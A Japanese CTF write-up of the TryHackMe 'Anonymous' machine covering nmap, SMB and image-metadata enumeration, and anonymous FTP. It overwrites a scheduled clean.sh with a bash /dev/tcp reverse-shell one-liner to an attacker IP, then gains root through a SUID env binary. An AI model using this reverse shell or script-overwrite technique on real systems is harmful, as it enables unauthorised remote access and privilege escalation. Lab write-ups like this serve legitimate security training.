最初に
TryHackMeのAnonymousをやってみます!
Task 1
Enumerate the machine. How many ports are open?
以下の4つが開いていました!
- 21
- 22
- 139
- 445
詳細は nmapの結果に記載しています!
What service is running on port 21?
nmapのSERVICEのところに記載があります
What service is running on ports 139 and 445?
SERVICEのところに記載はないのですが、Web検索したら出てくるかと思います。
There's a share on the user's computer. What's it called?
smbが使えたので、smbclientを実行してみると、よく使われるものではないpicsが見つけられます
user.txt
さっそくpicsにアクセスするとパスワードなしでログインできたので、格納されていた画像2つをさっそくダウンロード!
exiftoolでメタ情報を確認したところ、puppos.jpegにCreaterの情報がありました
Creator : Photographer: Tatyana Panova
Description : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
Rights : Tatyana Panova.www.tpanova.ru
Subject : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
Title : Three dogs of welsh corgi pembroke breed with white and red coat with tongue, sitting outdoors on green grass on summer sunny day
Tatyana Panovaさん、、、なんだかすごい人そう。。。
https://op.europa.eu/en/web/who-is-who/person/-/person/COM_0000CA073A7C
全出力はexiftool(corgo2)とexiftool(puppos)に記載しています
続いてSteghideでファイルを隠しているか確認してみましたが、何も見つからない。。
binwalkでバイナリレベルで何か埋め込まれているか確認してみましたが、特になにもなかったです。。。
SMBで手に入れた画像にはこれ以上何もなさそうなので、FTPをanonymousでアクセスしてみます。
scriptsディレクトリがあり、その中にいくつかファイルがあったので、全部ダウンロードします
各ファイルの中身は下図です。
ファイルを削除してログ出力するclean.shの中身ですが、間違っているところもありますね
tmp_filesは削除対象のようですが、現状は0なので、何も削除しないです。。。
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
removed_files.logの中身が少しずつ増えているので、clean.shは定期実行されているみたい。
(_1の方が先にダウンロードしたものです)
ローカルで以下のリバースシェルを張りに来るコードのclean.shを作成して、FTP側のファイルと置き換えて、
#!/bin/bash
bash -i >& /dev/tcp/10.8.1.106/8910 0>&1
ローカルでは、``でリッスンしておくと
時間がたてば、リバースシェルがはれました!
アクセスしたディレクトリの配下にuser.txtがあります!
root.txt
Root権限の足掛かりを探していきます
まずはsudo -lでRoot権限で実行できるものを探してみましたが、見つからず。。。
続いて、Rootが所有者でSUIDのビットのたっている実行ファイルを探します
全出力はRootが所有者でSUIDビットがたっている実行ファイルに記載しています。
パッケージ管理システムのsnapの実行ファイルも多くありますが、それ以外のものでGTFOBinsのSUIDで掲載されているものを探します
そうするとenvがひっかかりました!
これを参考にするとRootでシェルを起動できました!
あとは、/root配下にあるroot.txtをひらけばフラグがあります!
最後に
今回学んだことは以下2つです
- IDとPWがなくてもFTPはアクセスできる可能性がある
- SUIDビットのある実行ファイルの調査からGTFOBinsは最強
メモ
nmapの結果
┌──(root㉿kali)-[~]
└─# nmap -sV -script vuln -O -p 1-65535 10.10.220.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:08 JST
Nmap scan report for 10.10.220.213
Host is up (0.27s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A *EXPLOIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A *EXPLOIT*
| CVE-2023-38408 9.8 https://vulners.com/cve/CVE-2023-38408
| B8190CDB-3EB9-5631-9828-8064A1575B23 9.8 https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23 *EXPLOIT*
| 8FC9C5AB-3968-5F3C-825E-E8DB5379A623 9.8 https://vulners.com/githubexploit/8FC9C5AB-3968-5F3C-825E-E8DB5379A623 *EXPLOIT*
| 8AD01159-548E-546E-AA87-2DE89F3927EC 9.8 https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC *EXPLOIT*
| 5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A 9.8 https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A *EXPLOIT*
| CVE-2020-15778 7.8 https://vulners.com/cve/CVE-2020-15778
| SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT*
| PACKETSTORM:173661 7.5 https://vulners.com/packetstorm/PACKETSTORM:173661 *EXPLOIT*
| F0979183-AE88-53B4-86CF-3AF0523F3807 7.5 https://vulners.com/githubexploit/F0979183-AE88-53B4-86CF-3AF0523F3807 *EXPLOIT*
| 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT*
| CVE-2021-41617 7.0 https://vulners.com/cve/CVE-2021-41617
| EDB-ID:46516 6.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 6.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6110 6.8 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 6.8 https://vulners.com/cve/CVE-2019-6109
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2023-51385 6.5 https://vulners.com/cve/CVE-2023-51385
| CVE-2023-48795 5.9 https://vulners.com/cve/CVE-2023-48795
| CVE-2020-14145 5.9 https://vulners.com/cve/CVE-2020-14145
| CVE-2019-6111 5.9 https://vulners.com/cve/CVE-2019-6111
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| PACKETSTORM:181223 5.3 https://vulners.com/packetstorm/PACKETSTORM:181223 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 5.3 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
| EDB-ID:45939 5.3 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| EDB-ID:45233 5.3 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT*
| CVE-2018-20685 5.3 https://vulners.com/cve/CVE-2018-20685
| CVE-2018-15919 5.3 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.3 https://vulners.com/cve/CVE-2018-15473
| CVE-2016-20012 5.3 https://vulners.com/cve/CVE-2016-20012
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| CVE-2021-36368 3.7 https://vulners.com/cve/CVE-2021-36368
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT*
| EDB-ID:45210 0.0 https://vulners.com/exploitdb/EDB-ID:45210 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/13%OT=21%CT=1%CU=38331%PV=Y%DS=2%DC=I%G=Y%TM=670
OS:BB0D2%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=109%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)SEQ(SP=109%GCD=1%ISR=10C%TI=Z%C
OS:I=Z%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508S
OS:T11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5
OS:=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%
OS:T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1708.99 seconds
画像
exiftool(corgo2)
ExifTool Version Number : 12.76
File Name : corgo2.jpg
Directory : .
File Size : 43 kB
File Modification Date/Time : 2024:10:13 20:50:03+09:00
File Access Date/Time : 2024:10:13 20:52:16+09:00
File Inode Change Date/Time : 2024:10:13 20:52:16+09:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Profile CMM Type : Little CMS
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2012:01:25 03:41:57
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : c2
Profile Copyright : FB
Media White Point : 0.9642 1 0.82491
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Image Width : 800
Image Height : 533
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 800x533
Megapixels : 0.426
exiftool(puppos)
ExifTool Version Number : 12.76
File Name : puppos.jpeg
Directory : .
File Size : 265 kB
File Modification Date/Time : 2024:10:13 20:50:21+09:00
File Access Date/Time : 2024:10:13 20:52:26+09:00
File Inode Change Date/Time : 2024:10:13 20:52:26+09:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Photometric Interpretation : RGB
Image Description : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
Make : Canon
Camera Model Name : Canon EOS 5D Mark II
Orientation : Horizontal (normal)
Samples Per Pixel : 3
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Adobe Photoshop CC 2018 (Macintosh)
Modify Date : 2019:02:18 12:24:51
Artist : Photographer: Tatyana Panova
Y Cb Cr Positioning : Centered
Copyright : Tatyana Panova.www.tpanova.ru
Exposure Time : 1/250
F Number : 2.8
Exposure Program : Manual
ISO : 125
Exif Version : 0221
Date/Time Original : 2016:07:23 08:59:38
Create Date : 2016:07:23 08:59:38
Components Configuration : Y, Cb, Cr, -
Shutter Speed Value : 1/250
Aperture Value : 2.8
Exposure Compensation : 0
Max Aperture Value : 2.0
Metering Mode : Multi-segment
Flash : Off, Did not fire
Focal Length : 135.0 mm
Sub Sec Time Original : 82
Flashpix Version : 0100
Color Space : sRGB
Exif Image Width : 600
Exif Image Height : 400
Focal Plane X Resolution : 3849.211765
Focal Plane Y Resolution : 3908.141975
Focal Plane Resolution Unit : inches
Custom Rendered : Normal
Exposure Mode : Manual
White Balance : Manual
Scene Capture Type : Standard
Contrast : High
Saturation : Normal
Sharpness : Hard
Serial Number : 3431608384
Lens Info : 135mm f/?
Lens Model : EF135mm f/2L USM
Compression : JPEG (old-style)
Thumbnail Offset : 1234
Thumbnail Length : 5751
Current IPTC Digest : 1046626f1c229c56fb34d23bbdda2756
Coded Character Set : UTF8
Envelope Record Version : 4
Application Record Version : 4
Caption-Abstract : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
By-line : Photographer: Tatyana Panova
Object Name : Three dogs of welsh corgi pembroke breed with white and red coat
Time Created : 08:59:38+00:00
Country-Primary Location Name : Russian Federation
Keywords : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
Copyright Notice : Tatyana Panova.www.tpanova.ru
Local Caption : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
IPTC Digest : 1046626f1c229c56fb34d23bbdda2756
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 30
Global Altitude : 30
URL List :
Slices Group Name : Pembroke Welsh Corgis 118102236
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 5751 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2018
Photoshop Quality : 12
Photoshop Format : Progressive
Progressive Scans : 3 Scans
XMP Toolkit : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Approximate Focus Distance : 5.8
Firmware : 2.0.9
Flash Compensation : 0
Lens : EF135mm f/2L USM
Image Number : 0
Format : image/jpeg
Legacy IPTC Digest : 5DE4234A473A3566843FD0F2FF84254E
Date Created : 2016:07:23 08:59:38
Country : Russian Federation
Credit : tanipanova - stock.adobe.com
Source : 118102236
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Creator Tool : Adobe Photoshop CS6 (Windows)
Label : Выбрать
Metadata Date : 2019:02:18 12:24:51-05:00
Rating : 0
Document ID : xmp.did:BEE10DB23B52E61189C3B77A23A9257A
Instance ID : xmp.iid:75877983-44d5-4a42-b09a-81ff79d9f47f
Original Document ID : 333F4C47AEEA6DE803497C434CD9E134
Already Applied : True
Auto Lateral CA : 0
Blacks 2012 : 0
Blue Hue : 0
Blue Saturation : 0
Brightness : +50
Camera Profile : Adobe Standard
Camera Profile Digest : 3DA8CE4A626CE36A1D0C55BF157793C9
Clarity : 0
Clarity 2012 : 0
Color Noise Reduction : 25
Color Noise Reduction Detail : 50
Contrast 2012 : +16
Convert To Grayscale : False
Defringe : 0
Exposure : 0.00
Exposure 2012 : +0.25
Fill Light : 0
Grain Amount : 0
Green Hue : 0
Green Saturation : 0
Has Crop : False
Has Settings : True
Highlight Recovery : 0
Highlights 2012 : -39
Hue Adjustment Aqua : 0
Hue Adjustment Blue : 0
Hue Adjustment Green : +22
Hue Adjustment Magenta : 0
Hue Adjustment Orange : 0
Hue Adjustment Purple : 0
Hue Adjustment Red : 0
Hue Adjustment Yellow : 0
Lens Manual Distortion Amount : 0
Lens Profile Enable : 0
Lens Profile Setup : LensDefaults
Luminance Adjustment Aqua : 0
Luminance Adjustment Blue : 0
Luminance Adjustment Green : 0
Luminance Adjustment Magenta : 0
Luminance Adjustment Orange : 0
Luminance Adjustment Purple : 0
Luminance Adjustment Red : 0
Luminance Adjustment Yellow : 0
Luminance Smoothing : 0
Parametric Darks : 0
Parametric Highlight Split : 75
Parametric Highlights : 0
Parametric Lights : 0
Parametric Midtone Split : 50
Parametric Shadow Split : 25
Parametric Shadows : 0
Perspective Horizontal : 0
Perspective Rotate : 0.0
Perspective Scale : 100
Perspective Vertical : 0
Post Crop Vignette Amount : 0
Process Version : 6.7
Raw File Name : IMG_6219.CR2
Red Hue : 0
Red Saturation : 0
Saturation Adjustment Aqua : 0
Saturation Adjustment Blue : 0
Saturation Adjustment Green : 0
Saturation Adjustment Magenta : 0
Saturation Adjustment Orange : 0
Saturation Adjustment Purple : 0
Saturation Adjustment Red : 0
Saturation Adjustment Yellow : 0
Shadow Tint : 0
Shadows : 5
Shadows 2012 : +41
Sharpen Detail : 25
Sharpen Edge Masking : 0
Sharpen Radius : +1.0
Split Toning Balance : 0
Split Toning Highlight Hue : 0
Split Toning Highlight Saturation: 0
Split Toning Shadow Hue : 0
Split Toning Shadow Saturation : 0
Tint : +1
Tone Curve Name : Medium Contrast
Tone Curve Name 2012 : Linear
Version : 7.0
Vibrance : +11
Vignette Amount : 0
Whites 2012 : -40
Creator : Photographer: Tatyana Panova
Description : Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
Rights : Tatyana Panova.www.tpanova.ru
Subject : animal, dog, pembroke, corgi, welsh, cute, canine, happy, breed, portrait, pedigree, grass, posing, outdoor, happiness, nature, friend, green, funny, summer, beautiful, looking, color, purebred, adorable, playing, brown, smile, smiling, fun, standing, small, friendly, cheerful, young, view, background, park, life, little, walk, tongue, enjoy, pet, ears, pretty, domestic, lovely, horizontal, sun, grass, park, portrait
Title : Three dogs of welsh corgi pembroke breed with white and red coat with tongue, sitting outdoors on green grass on summer sunny day
Document Ancestors : xmp.did:BEE10DB23B52E61189C3B77A23A9257A
Credit Line : tanipanova - stock.adobe.com
Derived From Document ID : xmp.did:BEE10DB23B52E61189C3B77A23A9257A
Derived From Instance ID : xmp.iid:7FB65C5E4352E61190E1C89788FB283A
Derived From Original Document ID: 333F4C47AEEA6DE803497C434CD9E134
History Action : saved, saved, derived, saved, saved, converted, derived, saved, saved, saved, saved
History Changed : /metadata, /metadata, /, /, /, /metadata, /metadata, /
History Instance ID : xmp.iid:D8A179599B50E61194A0D5FD6D066061, xmp.iid:0000FF4A3B52E61189C3B77A23A9257A, xmp.iid:BEE10DB23B52E61189C3B77A23A9257A, xmp.iid:7FB65C5E4352E61190E1C89788FB283A, xmp.iid:80B65C5E4352E61190E1C89788FB283A, xmp.iid:138DB7A58152E611A43CC45C0ECCF258, xmp.iid:F71FE5628452E611B989BDA57765146E, xmp.iid:75877983-44d5-4a42-b09a-81ff79d9f47f
History Software Agent : Adobe Photoshop Camera Raw 7.0, Adobe Photoshop Camera Raw 7.0 (Windows), Adobe Photoshop Camera Raw 7.0 (Windows), Adobe Photoshop CS6 (Windows), Adobe Photoshop CS6 (Windows), Adobe Photoshop Camera Raw 7.0, Adobe Photoshop Camera Raw 7.0 (Windows), Adobe Photoshop CC 2018 (Macintosh)
History When : 2016:07:23 09:04:44+03:00, 2016:07:25 10:42:10+03:00, 2016:07:25 10:45:02+03:00, 2016:07:25 11:52:53+03:00, 2016:07:25 11:52:53+03:00, 2016:07:25 19:05:46+03:00, 2016:07:25 19:29:49+03:00, 2019:02:18 12:24:51-05:00
History Parameters : converted from image/x-canon-cr2 to image/tiff, from image/tiff to image/jpeg, converted from image/tiff to image/jpeg
Tone Curve : 0, 0, 32, 22, 64, 56, 128, 128, 192, 196, 255, 255
Tone Curve Blue : 0, 0, 255, 255
Tone Curve Green : 0, 0, 255, 255
Tone Curve PV2012 : 0, 0, 255, 255
Tone Curve PV2012 Blue : 0, 0, 255, 255
Tone Curve PV2012 Green : 0, 0, 255, 255
Tone Curve PV2012 Red : 0, 0, 255, 255
Tone Curve Red : 0, 0, 255, 255
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 600
Image Height : 400
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Aperture : 2.8
Image Size : 600x400
Megapixels : 0.240
Scale Factor To 35 mm Equivalent: 9.1
Shutter Speed : 1/250
Date/Time Original : 2016:07:23 08:59:38.82
Thumbnail Image : (Binary data 5751 bytes, use -b option to extract)
Date/Time Created : 2016:07:23 08:59:38+00:00
Circle Of Confusion : 0.003 mm
Depth Of Field : 0.03 m (5.78 - 5.82 m)
Field Of View : 1.7 deg
Focal Length : 135.0 mm (35 mm equivalent: 1233.2 mm)
Hyperfocal Distance : 1978.87 m
Light Value : 10.6
Lens ID : Canon EF 135mm f/2L USM
Rootが所有者でSUIDビットがたっている実行ファイル
find / -user root -perm -u=s 2>/dev/null
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9066/bin/mount
/snap/core/9066/bin/ping
/snap/core/9066/bin/ping6
/snap/core/9066/bin/su
/snap/core/9066/bin/umount
/snap/core/9066/usr/bin/chfn
/snap/core/9066/usr/bin/chsh
/snap/core/9066/usr/bin/gpasswd
/snap/core/9066/usr/bin/newgrp
/snap/core/9066/usr/bin/passwd
/snap/core/9066/usr/bin/sudo
/snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9066/usr/lib/openssh/ssh-keysign
/snap/core/9066/usr/lib/snapd/snap-confine
/snap/core/9066/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/env
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec